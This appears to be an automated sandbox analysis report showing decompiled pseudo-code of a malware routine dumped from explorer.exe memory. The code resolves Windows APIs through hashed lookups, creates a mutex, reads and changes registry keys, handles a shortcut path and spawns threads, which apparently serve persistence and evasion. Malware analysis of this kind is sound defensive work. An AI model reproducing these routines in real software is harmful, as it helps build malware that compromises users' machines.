				 *0x7cb428 = E007C1994(_v12, 0xbdb70517);
				 *0x7cb430 = E007C1994(_v12, 0x1d6c998b);
				 *0x7cb434 = E007C1994(_v12, 0xa2f65ba2);
				 *0x7cb438 = E007C1994(_v12, 0xad4ffcd5);
				 *0x7cb43c = E007C1994(_v12, 0xc8a274ac);
				 *0x7cb440 = E007C1994(_v12, 0x5fda1871);
				 *0x7cb444 = E007C1994(_v12, 0xc0d4187d);
				_t564 = LoadLibraryA("Psapi"); // executed
				_v12 = _t564;
				 *0x7cb4e4 = E007C1994(_v12, 0x860331a8);
				_t567 =  *0x7ca0a4; // 0x7c1c40
				_t568 = LoadLibraryA(_t567); // executed
				_v12 = _t568;
				 *0x7cb178 = E007C1994(_v12, 0xa60c5f05);
				_t571 =  *0x7ca0d0; // 0x7c1cac
				_v12 = LoadLibraryA(_t571);
				 *0x7cb3ec = E007C1994(_v12, 0x5af0017c);
				 *0x7cb3f0 = E007C1994(_v12, 0x5e10f525);
				 *0x7cb3f4 = E007C1994(_v12, 0x48b87efc);
				 *0x7cb3f8 = E007C1994(_v12, 0xdf91a857);
				 *0x7cb3fc = E007C1994(_v12, 0x9e90b462);
				 *0x7cb400 = E007C1994(_v12, 0x4894dafc);
				 *0x7cb404 = E007C1994(_v12, 0x59012669);
				_t587 =  *0x7ca0e0; // 0x7c1d08
				_v12 = LoadLibraryA(_t587);
				 *0x7cb330 = E007C1994(_v12, 0xb9d41c2f);
				 *0x7cb1b8 = E007C1994(_v12, 0xb96ca1c0);
				 *0x7cb1c0 = E007C1994(_v12, 0x28e9e291);
				 *0x7cb1c8 = E007C1994(_v12, 0x1d1f334a);
				 *0x7cb1cc = E007C1994(_v12, 0x5cb5ef72);
				 *0x7cb2c8 = E007C1994(_v12, 0xce303c3a);
				 *0x7cb2c4 = E007C1994(_v12, 0x3e68cfc6);
				 *0x7cb2cc = E007C1994(_v12, 0xd4ecc759);
				 *0x7cb2d0 = E007C1994(_v12, 0xd21e3d01);
				 *0x7cb2d4 = E007C1994(_v12, 0xad0c9f7e);
				 *0x7cb4fc = E007C1994(_v12, 0x8ad7de34);
				 *0x7cb500 = E007C1994(_v12, 0x78660dbe);
				 *0x7cb504 = E007C1994(_v12, 0xcebf13be);
				 *0x7cb508 = E007C1994(_v12, 0xd4b3d42);
				 *0x7cb50c = E007C1994(_v12, 0x72760bb8);
				 *0x7cb448 = E007C1994(_v12, 0x3c4de260);
				 *0x7cb44c = E007C1994(_v12, 0xf837a387);
				 *0x7cb450 = E007C1994(_v12, 0xc3f46335);
				 *0x7cb454 = E007C1994(_v12, 0xa5ffa46e);
				 *0x7cb458 = E007C1994(_v12, 0x453db143);
				 *0x7cb45c = E007C1994(_v12, 0x37a53419);
				 *0x7cb460 = E007C1994(_v12, 0xcebf17e6);
				 *0x7cb17c = E007C1994(_v12, 0xaad67ff8);
				 *0x7cb180 = E007C1994(_v12, 0x3ef2d3dd);
				 *0x7cb184 = E007C1994(_v12, 0x90a097e6);
				 *0x7cb16c = E007C1994(_v12, 0x7a2167dc);
				 *0x7cb170 = E007C1994(_v12, 0x1b3d12b9);
				 *0x7cb174 = E007C1994(_v12, 0x80dbbe07);
				 *0x7cb1ac = E007C1994(_v12, 0x398c5285);
				 *0x7cb1dc = E007C1994(_v12, 0x560c7c4a);
				 *0x7cb1d8 = E007C1994(_v12, 0xdb355534);
				 *0x7cb1d4 = E007C1994(_v12, 0x3e400fd6);
				 *0x7cb1e4 = E007C1994(_v12, 0xee6ab5d);
				 *0x7cb1e8 = E007C1994(_v12, 0x1802e7c8);
				 *0x7cb1ec = E007C1994(_v12, 0xf65a7d95);
				 *0x7cb224 = E007C1994(_v12, 0xb8538a52);
				 *0x7cb228 = E007C1994(_v12, 0xccd03c3a);
				 *0x7cb328 = E007C1994(_v12, 0x6d523bdd);
				 *0x7cb32c = E007C1994(_v12, 0xf2f9de08);
				 *0x7cb324 = E007C1994(_v12, 0xce30283a);
				_t669 =  *0x7ca094; // 0x7c1c20
				_v12 = LoadLibraryA(_t669);
				 *0x7cb214 = E007C1994(_v12, 0x3caa9945);
				 *0x7cb218 = E007C1994(_v12, 0x5a56b493);
				 *0x7cb258 = E007C1994(_v12, 0x7dfb3ef0);
				_t677 =  *0x7ca088; // 0x7c1bf8
				_v12 = LoadLibraryA(_t677);
				 *0x7cb14c = E007C1994(_v12, 0xf2276995);
				 *0x7cb21c = E007C1994(_v12, 0xc95d8550);
				 *0x7cb220 = E007C1994(_v12, 0x570bc899);
				_t685 =  *0x7ca098; // 0x7c1c28
				_t686 = LoadLibraryA(_t685); // executed
				_v12 = _t686;
				 *0x7cb27c = E007C1994(_v12, 0x368435be);
				 *0x7cb280 = E007C1994(_v12, 0xf341d5cf);
				 *0x7cb284 = E007C1994(_v12, 0xedb3159d);
				_t693 =  *0x7ca1b8; // 0x7c1eec
				_v12 = LoadLibraryA(_t693);
				 *0x7cb288 = E007C1994(_v12, 0x3184919f);
				 *0x7cb28c = E007C1994(_v12, 0x39aedd1b);
				_t699 =  *0x7ca0a0; // 0x7c1c38
				_t700 = LoadLibraryA(_t699); // executed
				_v12 = _t700;
				 *0x7cb290 = E007C1994(_v12, 0x8a94f707);
				 *0x7cb294 = E007C1994(_v12, 0x7aa45c7a);
				 *0x7cb298 = E007C1994(_v12, 0x4e26c00f);
				_t707 =  *0x7ca0cc; // 0x7c1ca4
				_v12 = LoadLibraryA(_t707);
				 *0x7cb33c = E007C1994(_v12, 0x233e6d0f);
				_t712 = E007C1994(_v12, 0xbf821ad);
				 *0x7cb340 = _t712;
				if(_v8 != 0) {
					_t713 =  *0x7ca1b0; // 0x7c1edc
					_t714 = LoadLibraryA(_t713); // executed
					_v12 = _t714;
					 *0x7cb34c = E007C1994(_v12, 0xd939f838);
					 *0x7cb344 = E007C1994(_v12, 0x9400a044);
					 *0x7cb348 = E007C1994(_v12, 0xee9bf475);
					 *0x7cb3a4 = E007C1994(_v12, 0xe797764);
					 *0x7cb3a8 = E007C1994(_v12, 0xedd8fe8a);
					 *0x7cb3ac = E007C1994(_v12, 0xe5971f6);
					 *0x7cb3b0 = E007C1994(_v12, 0x5d99726a);
					 *0x7cb3b4 = E007C1994(_v12, 0x1f935b1d);
					 *0x7cb3b8 = E007C1994(_v12, 0xfc7af16a);
					 *0x7cb3bc = E007C1994(_v12, 0x939d7d9c);
					 *0x7cb3c0 = E007C1994(_v12, 0xcdde757d);
					 *0x7cb3c4 = E007C1994(_v12, 0xc5a7764);
					 *0x7cb3c8 = E007C1994(_v12, 0x9e7d3188);
					 *0x7cb3cc = E007C1994(_v12, 0x3c797b7a);
					 *0x7cb3d0 = E007C1994(_v12, 0x4dfc1f3b);
					 *0x7cb3d4 = E007C1994(_v12, 0x8e9bf775);
					 *0x7cb3d8 = E007C1994(_v12, 0x8fb8b5bd);
					 *0x7cb3dc = E007C1994(_v12, 0xb909d088);
					 *0x7cb3e0 = E007C1994(_v12, 0xf44318c6);
					 *0x7cb3e4 = E007C1994(_v12, 0x95e4a5d7);
					_t755 =  *0x7ca1b4; // 0x7c1ee4
					_t756 = LoadLibraryA(_t755); // executed
					_v12 = _t756;
					 *0x7cb13c = E007C1994(_v12, 0xaa91290b);
					 *0x7cb350 = E007C1994(_v12, 0x8593dd7);
					 *0x7cb354 = E007C1994(_v12, 0x6ae49924);
					 *0x7cb358 = E007C1994(_v12, 0x7314fb0c);
					 *0x7cb35c = E007C1994(_v12, 0xb87dbd66);
					 *0x7cb360 = E007C1994(_v12, 0x2f5ce027);
					 *0x7cb364 = E007C1994(_v12, 0xa3a80ab6);
					 *0x7cb368 = E007C1994(_v12, 0xddcb15d);
					 *0x7cb36c = E007C1994(_v12, 0x8733d614);
					 *0x7cb370 = E007C1994(_v12, 0xfde87743);
					 *0x7cb390 = E007C1994(_v12, 0x1a212962);
					 *0x7cb394 = E007C1994(_v12, 0x9f13856a);
					 *0x7cb398 = E007C1994(_v12, 0xbe618d3e);
					 *0x7cb39c = E007C1994(_v12, 0x1510002f);
					 *0x7cb3a0 = E007C1994(_v12, 0x7edec584);
					 *0x7cb380 = E007C1994(_v12, 0xaa912901);
					 *0x7cb374 = E007C1994(_v12, 0x2ae71934);
					 *0x7cb378 = E007C1994(_v12, 0x1ad09c78);
					 *0x7cb37c = E007C1994(_v12, 0x9ef6461);
					_t712 = E007C1994(_v12, 0x57fbc0dd);
					 *0x7cb3e8 = _t712;
				}
				return _t712;
			}

























    0x007c257a
    0x007c2582
    0x007c2592
    0x007c25a4
    0x007c25b6
    0x007c25c8
    0x007c25da
    0x007c25ec
    0x007c25fe
    0x007c2610
    0x007c2622
    0x007c2634
    0x007c2646
    0x007c2658
    0x007c266a
    0x007c267c
    0x007c268e
    0x007c26a0
    0x007c26b2
    0x007c26c4
    0x007c26d6
    0x007c26e8
    0x007c26fa
    0x007c270c
    0x007c271e
    0x007c2730
    0x007c2742
    0x007c2754
    0x007c2766
    0x007c2778
    0x007c278a
    0x007c279c
    0x007c27ae
    0x007c27c0
    0x007c27d2
    0x007c27e4
    0x007c27f6
    0x007c2808
    0x007c281a
    0x007c282c
    0x007c283e
    0x007c2850
    0x007c2862
    0x007c2874
    0x007c2886
    0x007c2898
    0x007c28aa
    0x007c28bc
    0x007c28ce
    0x007c28e0
    0x007c28f2
    0x007c2904
    0x007c2916
    0x007c2928
    0x007c293a
    0x007c294c
    0x007c295e
    0x007c2970
    0x007c2982
    0x007c2994
    0x007c29a6
    0x007c29b8
    0x007c29ca
    0x007c29dc
    0x007c29ee
    0x007c2a00
    0x007c2a12
    0x007c2a24
    0x007c2a36
    0x007c2a48
    0x007c2a5a
    0x007c2a6c
    0x007c2a7e
    0x007c2a90
    0x007c2aa2
    0x007c2ab4
    0x007c2ac6
    0x007c2ad8
    0x007c2aea
    0x007c2afc
    0x007c2b0e
    0x007c2b20
    0x007c2b32
    0x007c2b44
    0x007c2b56
    0x007c2b68
    0x007c2b7a
    0x007c2b8c
    0x007c2b9e
    0x007c2bb0
    0x007c2bc2
    0x007c2bd4
    0x007c2be6
    0x007c2bf8
    0x007c2c0a
    0x007c2c1c
    0x007c2c2e
    0x007c2c40
    0x007c2c52
    0x007c2c64
    0x007c2c76
    0x007c2c88
    0x007c2c9a
    0x007c2cac
    0x007c2cbe
    0x007c2cd0
    0x007c2ce2
    0x007c2cf4
    0x007c2d06
    0x007c2d18
    0x007c2d2a
    0x007c2d3c
    0x007c2d4e
    0x007c2d53
    0x007c2d5f
    0x007c2d6f
    0x007c2d81
    0x007c2d93
    0x007c2d98
    0x007c2da4
    0x007c2db4
    0x007c2dc6
    0x007c2dd8
    0x007c2dea
    0x007c2dfc
    0x007c2e0e
    0x007c2e20
    0x007c2e32
    0x007c2e44
    0x007c2e56
    0x007c2e68
    0x007c2e7a
    0x007c2e8c
    0x007c2e9e
    0x007c2eb0
    0x007c2ec2
    0x007c2ed4
    0x007c2ee6
    0x007c2ef8
    0x007c2f0a
    0x007c2f1c
    0x007c2f2e
    0x007c2f40
    0x007c2f52
    0x007c2f64
    0x007c2f76
    0x007c2f88
    0x007c2f9a
    0x007c2fac
    0x007c2fbe
    0x007c2fd0
    0x007c2fda
    0x007c2fe0
    0x007c2ff0
    0x007c2ff5
    0x007c2ffb
    0x007c3001
    0x007c3011
    0x007c3016
    0x007c3022
    0x007c3032
    0x007c3044
    0x007c3056
    0x007c3068
    0x007c307a
    0x007c308c
    0x007c309e
    0x007c30a3
    0x007c30af
    0x007c30bf
    0x007c30d1
    0x007c30e3
    0x007c30f5
    0x007c3107
    0x007c3119
    0x007c312b
    0x007c313d
    0x007c314f
    0x007c3161
    0x007c3173
    0x007c3185
    0x007c3197
    0x007c31a9
    0x007c31bb
    0x007c31cd
    0x007c31df
    0x007c31f1
    0x007c3203
    0x007c3215
    0x007c3227
    0x007c3239
    0x007c324b
    0x007c325d
    0x007c326f
    0x007c3281
    0x007c3293
    0x007c32a5
    0x007c32b7
    0x007c32c9
    0x007c32db
    0x007c32ed
    0x007c32ff
    0x007c3311
    0x007c3323
    0x007c3335
    0x007c3347
    0x007c3359
    0x007c336b
    0x007c337d
    0x007c3382
    0x007c338e
    0x007c339e
    0x007c33b0
    0x007c33c2
    0x007c33c7
    0x007c33d3
    0x007c33e3
    0x007c33f5
    0x007c3407
    0x007c340c
    0x007c3412
    0x007c3418
    0x007c3428
    0x007c343a
    0x007c344c
    0x007c3451
    0x007c345d
    0x007c346d
    0x007c347f
    0x007c3484
    0x007c348a
    0x007c3490
    0x007c34a0
    0x007c34b2
    0x007c34c4
    0x007c34c9
    0x007c34d5
    0x007c34e5
    0x007c34f2
    0x007c34f7
    0x007c3500
    0x007c3506
    0x007c350c
    0x007c3512
    0x007c3522
    0x007c3534
    0x007c3546
    0x007c3558
    0x007c356a
    0x007c357c
    0x007c358e
    0x007c35a0
    0x007c35b2
    0x007c35c4
    0x007c35d6
    0x007c35e8
    0x007c35fa
    0x007c360c
    0x007c361e
    0x007c3630
    0x007c3642
    0x007c3654
    0x007c3666
    0x007c3678
    0x007c367d
    0x007c3683
    0x007c3689
    0x007c3699
    0x007c36ab
    0x007c36bd
    0x007c36cf
    0x007c36e1
    0x007c36f3
    0x007c3705
    0x007c3717
    0x007c3729
    0x007c373b
    0x007c374d
    0x007c375f
    0x007c3771
    0x007c3783
    0x007c3795
    0x007c37a7
    0x007c37b9
    0x007c37cb
    0x007c37dd
    0x007c37ea
    0x007c37ef
    0x007c37ef
    0x007c3858

    APIs
    • LoadLibraryA.KERNEL32(007C1BF0), ref: 007C2D59
    • LoadLibraryA.KERNEL32(007C1BE8), ref: 007C2D9E
    • LoadLibraryA.KERNELBASE(Psapi), ref: 007C2FDA
    • LoadLibraryA.KERNELBASE(007C1C40), ref: 007C2FFB
    • LoadLibraryA.KERNEL32(007C1CAC), ref: 007C301C
    • LoadLibraryA.KERNEL32(007C1D08), ref: 007C30A9
    • LoadLibraryA.KERNEL32(007C1C20), ref: 007C3388
    • LoadLibraryA.KERNEL32(007C1BF8), ref: 007C33CD
    • LoadLibraryA.KERNELBASE(007C1C28), ref: 007C3412
    • LoadLibraryA.KERNEL32(007C1EEC), ref: 007C3457
    • LoadLibraryA.KERNELBASE(007C1C38), ref: 007C348A
    • LoadLibraryA.KERNEL32(007C1CA4), ref: 007C34CF
    • LoadLibraryA.KERNELBASE(007C1EDC), ref: 007C350C
    • LoadLibraryA.KERNELBASE(007C1EE4), ref: 007C3683
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8D0C, Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 230threadsleep

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 505 7c8d0c-7c8d4b call 7c458c call 7c2574 call 7c44f0 GetCurrentProcess call 7c42d4 call 7c44f0 516 7c8d5d-7c8d63 GetCurrentProcess call 7c42d4 505->516 517 7c8d4d-7c8d5b call 7c41cc 505->517 520 7c8d68-7c8d72 516->520 522 7c8d77-7c8e3c GetCurrentProcess call 7c453c call 7c79bc LocalAlloc call 7c4408 CreateMutexA LocalFree call 7c1b50 call 7c8bfc call 7c7984 call 7c89d4 call 7c7a44 RtlInitializeCriticalSection call 7c47ac call 7c7304 517->522 520->522 543 7c8e48-7c8e4c 522->543 544 7c8e3e-7c8e43 call 7c744c 522->544 545 7c8e54-7c8e5e call 7c471c 543->545 546 7c8e4e-7c8e52 543->546 544->543 548 7c8e63-7c8e67 545->548 546->545 546->548 550 7c8ed8-7c8ee3 548->550 551 7c8e69-7c8eb4 call 7c1308 call 7c12dc call 7c133c call 7c471c 548->551 553 7c8f00-7c8f04 550->553 554 7c8ee5-7c8ef0 550->554 580 7c8ec8-7c8ed3 call 7c4a1c 551->580 581 7c8eb6-7c8ec6 call 7c4a1c 551->581 557 7c8f23-7c8f84 call 7c744c call 7c8b98 call 7c8b6c call 7c4ba0 call 7c5468 * 2 call 7c3b80 call 7c1308 call 7c1440 553->557 558 7c8f06-7c8f0a 553->558 554->553 556 7c8ef2-7c8efb call 7c8cf8 554->556 556->553 605 7c8f9a-7c8fa7 call 7c8064 557->605 606 7c8f86-7c8f93 call 7c8064 557->606 558->557 562 7c8f0c-7c8f1e call 7c1308 call 7c8b6c 558->562 577 7c901f-7c9062 call 7c38dc call 7c38ec call 7c5640 call 7c1308 call 7c84a4 562->577 602 7c9067-7c9072 RtlExitUserThread 577->602 580->550 581->550 610 7c8fac-7c8fb3 605->610 609 7c8f98 606->609 609->610 611 7c8fd7-7c8fe2 610->611 612 7c8fb5-7c8fc1 610->612 613 7c8fe4-7c8ff1 611->613 614 7c9015-7c901a call 7c7474 611->614 612->611 615 7c8fc3-7c8fd5 Sleep 612->615 617 7c9006-7c9010 call 7c471c 613->617 618 7c8ff3-7c8ffa 613->618 614->577 615->611 615->615 617->614 618->617 620 7c8ffc-7c9000 GetCursorPos 618->620 620->617
    C-Code - Quality: 87%
    			E007C8D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				struct tagPOINT _v36;
				struct _SECURITY_ATTRIBUTES _v52;
				char _v309;
				void* _t58;
				intOrPtr _t59;
				void* _t60;
				void* _t61;
				signed int _t62;
				void* _t65;
				signed char _t66;
				CHAR* _t72;
				void* _t74;
				intOrPtr _t90;
				signed int _t92;
				intOrPtr _t128;
				signed int _t133;
				signed int _t139;
				signed char _t164;
				void* _t166;
				void* _t171;
				intOrPtr _t183;
				void* _t188;
				void* _t191;

				_t191 = __eflags;
				_t166 = __ecx;
				 *0x7cb114 = E007C458C(0);
				E007C2574(_t54 | 0xffffffff); // executed
				 *0x7ca064 = E007C44F0(_t191);
				_t58 = GetCurrentProcess(); // executed
				_t59 = E007C42D4(_t58); // executed
				 *0x7ca068 = _t59;
				_t60 = E007C44F0(_t191);
				_t192 = _t60 - 0x3c;
				if(_t60 >= 0x3c) {
					_t61 = GetCurrentProcess(); // executed
					_t62 = E007C42D4(_t61); // executed
					__eflags = _t62 - 3;
					_t2 = _t62 == 3;
					__eflags = _t2;
					asm("sbb eax, eax");
					 *0x7ca034 =  ~(_t62 & 0xffffff00 | _t2);
				} else {
					_t164 = E007C41CC();
					asm("sbb eax, eax");
					 *0x7ca034 =  ~_t164;
				}
				_t65 = GetCurrentProcess(); // executed
				_t66 = E007C453C(_t65); // executed
				asm("sbb eax, eax");
				 *0x7ca058 =  ~_t66;
				E007C79BC(_t192);
				_v28 = LocalAlloc(0, 0x14);
				E007C4408( &_v52, _v28);
				_t72 =  *0x7ca0d8; // 0x7c1cc8
				_t74 = CreateMutexA( &_v52, 0, _t72); // executed
				 *0x7ca054 = _t74;
				LocalFree(_v28);
				_t77 = _a4;
				asm("sbb eax, eax");
				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
				_t80 = _a4;
				asm("sbb eax, eax");
				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
				_a4 = _a4 + 2;
				E007C1B50(); // executed
				E007C8BFC(); // executed
				E007C7984(); // executed
				E007C89D4(); // executed
				E007C7A44(_t166); // executed
				 *0x7cb408(0x7cbe04);
				_t90 = E007C47AC(_a4, 0x7cb510); // executed
				 *0x7cb514 = _t90;
				_t92 = E007C7304(0x7cb61c); // executed
				_v24 = _t92;
				asm("sbb eax, eax");
				if( ~( ~_v24) == 0) {
					E007C744C(0x7cb61c); // executed
				}
				if(_v12 != 0 || _v16 != 0) {
					E007C471C(_a4, 0x2ee0, 0);
				}
				if(_v12 != 0) {
					E007C1308( &_v309, _a4);
					 *((char*)(_t188 + E007C12DC( &_v309) - 0x135)) = 0;
					E007C133C( &_v309, ".lnk");
					E007C471C( &_v309, 0, 0);
					if( *0x7ca034 == 0) {
						E007C4A1C(0x80000001,  &_v309);
					} else {
						E007C4A1C(0x80000002,  &_v309);
					}
				}
				asm("sbb eax, eax");
				if( ~( ~_v12) == 0) {
					asm("sbb eax, eax");
					if( ~( ~_v16) == 0) {
						_t183 =  *0x7cb514; // 0x28800
						E007C8CF8(_a4, _t183);
					}
				}
				if(_v12 == 0 || _v24 == 0) {
					E007C744C(0x7cb61c); // executed
					E007C8B98(0x7cb518); // executed
					E007C8B6C(); // executed
					E007C4BA0(0x7cb719); // executed
					 *0x7cb780 = E007C5468();
					 *0x7cb651 = E007C5468();
					_v8 = E007C3B80(5, 0x19, 0xd);
					E007C1308(0x7cb752, _v8);
					E007C1440(_v8);
					__eflags =  *0x7ca034;
					if( *0x7ca034 == 0) {
						__eflags = 0;
						_t181 =  *0x7ca260; // 0x7c21a4
						E007C8064(0x80000001, 0, _t181);
					} else {
						_t181 =  *0x7ca260; // 0x7c21a4
						E007C8064(0x80000002, 0, _t181); // executed
					}
					__eflags =  *0x7cb621;
					if( *0x7cb621 == 0) {
						L24:
						asm("sbb eax, eax");
						__eflags =  ~( ~_v12);
						if(__eflags == 0) {
							_t133 =  *0x7cb784; // 0xd4
							__eflags = _t133 &  *0x7ca070;
							if((_t133 &  *0x7ca070) != 0) {
								__eflags =  *0x7cb621 - 0x5a;
								if( *0x7cb621 > 0x5a) {
									GetCursorPos( &_v36);
								}
							}
							_t181 = 0;
							__eflags = 0;
							E007C471C(_a4, 0x2ee0, 0); // executed
						}
						E007C7474(0x7cb61c, __eflags); // executed
						goto L30;
					} else {
						_t139 =  *0x7cb621; // 0x12c
						_v20 = _t139;
						__eflags = _v20;
						if(_v20 == 0) {
							goto L24;
						} else {
							goto L23;
						}
						do {
							L23:
							Sleep(0x3e8); // executed
							_v20 = _v20 - 1;
							__eflags = _v20;
						} while (_v20 != 0);
						goto L24;
					}
				} else {
					_t181 = _a4;
					E007C1308(0x7cb518, _a4);
					E007C8B6C();
					L30:
					E007C38DC(0x7cbe04);
					 *0x7cc380 = 0;
					E007C38EC(0x7cbe04);
					_pop(_t171);
					E007C5640(0x7cc384, _t171, _t181);
					_t128 =  *0x7cb64d; // 0x0
					 *0x7cc355 = _t128;
					E007C1308(0x7cc254, 0x7cb625);
					E007C84A4(); // executed
					_push(0);
					return RtlExitUserThread();
				}
			}
































    0x007c8d0c
    0x007c8d0c
    0x007c8d1c
    0x007c8d24
    0x007c8d2e
    0x007c8d33
    0x007c8d39
    0x007c8d3e
    0x007c8d43
    0x007c8d48
    0x007c8d4b
    0x007c8d5d
    0x007c8d63
    0x007c8d68
    0x007c8d6b
    0x007c8d6b
    0x007c8d70
    0x007c8d72
    0x007c8d4d
    0x007c8d4d
    0x007c8d54
    0x007c8d56
    0x007c8d56
    0x007c8d77
    0x007c8d7d
    0x007c8d84
    0x007c8d86
    0x007c8d8b
    0x007c8d9a
    0x007c8da3
    0x007c8da8
    0x007c8db4
    0x007c8dba
    0x007c8dc3
    0x007c8dc9
    0x007c8dd4
    0x007c8dd6
    0x007c8dd9
    0x007c8de5
    0x007c8de7
    0x007c8dea
    0x007c8dee
    0x007c8df3
    0x007c8df8
    0x007c8dfd
    0x007c8e02
    0x007c8e0c
    0x007c8e1a
    0x007c8e1f
    0x007c8e29
    0x007c8e2e
    0x007c8e36
    0x007c8e3c
    0x007c8e43
    0x007c8e43
    0x007c8e4c
    0x007c8e5e
    0x007c8e5e
    0x007c8e67
    0x007c8e72
    0x007c8e82
    0x007c8e96
    0x007c8ea8
    0x007c8eb4
    0x007c8ed3
    0x007c8eb6
    0x007c8ec1
    0x007c8ec1
    0x007c8eb4
    0x007c8edd
    0x007c8ee3
    0x007c8eea
    0x007c8ef0
    0x007c8ef2
    0x007c8efb
    0x007c8efb
    0x007c8ef0
    0x007c8f04
    0x007c8f28
    0x007c8f32
    0x007c8f37
    0x007c8f41
    0x007c8f4b
    0x007c8f55
    0x007c8f65
    0x007c8f70
    0x007c8f78
    0x007c8f7d
    0x007c8f84
    0x007c8f9a
    0x007c8f9c
    0x007c8fa7
    0x007c8f86
    0x007c8f88
    0x007c8f93
    0x007c8f93
    0x007c8fac
    0x007c8fb3
    0x007c8fd7
    0x007c8fdc
    0x007c8fe0
    0x007c8fe2
    0x007c8fe4
    0x007c8fef
    0x007c8ff1
    0x007c8ff3
    0x007c8ffa
    0x007c9000
    0x007c9000
    0x007c8ffa
    0x007c900b
    0x007c900b
    0x007c9010
    0x007c9010
    0x007c901a
    0x00000000
    0x007c8fb5
    0x007c8fb5
    0x007c8fba
    0x007c8fbd
    0x007c8fc1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x007c8fc3
    0x007c8fc3
    0x007c8fc8
    0x007c8fce
    0x007c8fd1
    0x007c8fd1
    0x00000000
    0x007c8fc3
    0x007c8f0c
    0x007c8f11
    0x007c8f14
    0x007c8f19
    0x007c901f
    0x007c9024
    0x007c902c
    0x007c9036
    0x007c903b
    0x007c9041
    0x007c9046
    0x007c904b
    0x007c905a
    0x007c9062
    0x007c9067
    0x007c9072
    0x007c9072

    APIs
      • Part of subcall function 007C44F0: GetVersionExA.KERNEL32(0000009C), ref: 007C451A
    • GetCurrentProcess.KERNEL32 ref: 007C8D33
      • Part of subcall function 007C42D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007C42EC
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007C430E
      • Part of subcall function 007C42D4: GetLastError.KERNEL32 ref: 007C4322
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 007C4358
      • Part of subcall function 007C42D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 007C436E
      • Part of subcall function 007C42D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 007C4393
      • Part of subcall function 007C42D4: CloseHandle.KERNEL32(?), ref: 007C43F3
    • GetCurrentProcess.KERNEL32 ref: 007C8D5D
    • GetCurrentProcess.KERNEL32 ref: 007C8D77
      • Part of subcall function 007C453C: GetCurrentProcess.KERNEL32 ref: 007C4555
      • Part of subcall function 007C453C: IsWow64Process.KERNELBASE(00000000,?), ref: 007C456F
      • Part of subcall function 007C79BC: RtlInitializeCriticalSection.NTDLL(007CBE04), ref: 007C7A14
      • Part of subcall function 007C79BC: RtlInitializeCriticalSection.NTDLL(007CC234), ref: 007C7A2E
    • LocalAlloc.KERNEL32(00000000,00000014), ref: 007C8D94
      • Part of subcall function 007C4408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007C441F
      • Part of subcall function 007C4408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 007C4437
      • Part of subcall function 007C4408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(007C1CB4,00000001,?,00000000), ref: 007C4453
      • Part of subcall function 007C4408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4478
      • Part of subcall function 007C4408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4498
      • Part of subcall function 007C4408: LocalFree.KERNEL32(?), ref: 007C44AC
    • CreateMutexA.KERNELBASE(?,00000000,007C1CC8), ref: 007C8DB4
    • LocalFree.KERNEL32(?), ref: 007C8DC3
      • Part of subcall function 007C8BFC: RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C8C1B
      • Part of subcall function 007C7984: GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,007CB110,?,?,00000000,00000000), ref: 007C79A5
      • Part of subcall function 007C89D4: GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C89F4
      • Part of subcall function 007C7A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 007C7A67
      • Part of subcall function 007C7A44: GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 007C7A88
      • Part of subcall function 007C7A44: GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 007C7AB9
    • RtlInitializeCriticalSection.NTDLL(007CBE04), ref: 007C8E0C
      • Part of subcall function 007C47AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C47D9
      • Part of subcall function 007C47AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C47FB
      • Part of subcall function 007C47AC: GetFileSize.KERNEL32(?,00000000), ref: 007C4810
      • Part of subcall function 007C47AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C483F
      • Part of subcall function 007C47AC: CloseHandle.KERNEL32(?), ref: 007C4849
      • Part of subcall function 007C7304: RegOpenKeyExA.KERNELBASE(80000002,007C21A4,00000000,000F003F,?), ref: 007C7331
      • Part of subcall function 007C7304: RegOpenKeyExA.ADVAPI32(80000001,007C21A4,00000000,000F003F,?), ref: 007C7352
      • Part of subcall function 007C471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
      • Part of subcall function 007C471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
      • Part of subcall function 007C471C: CloseHandle.KERNEL32(?), ref: 007C4790
      • Part of subcall function 007C4A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 007C4A55
      • Part of subcall function 007C8B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 007C8BB2
      • Part of subcall function 007C8B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C8BD6
      • Part of subcall function 007C8B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 007C8B81
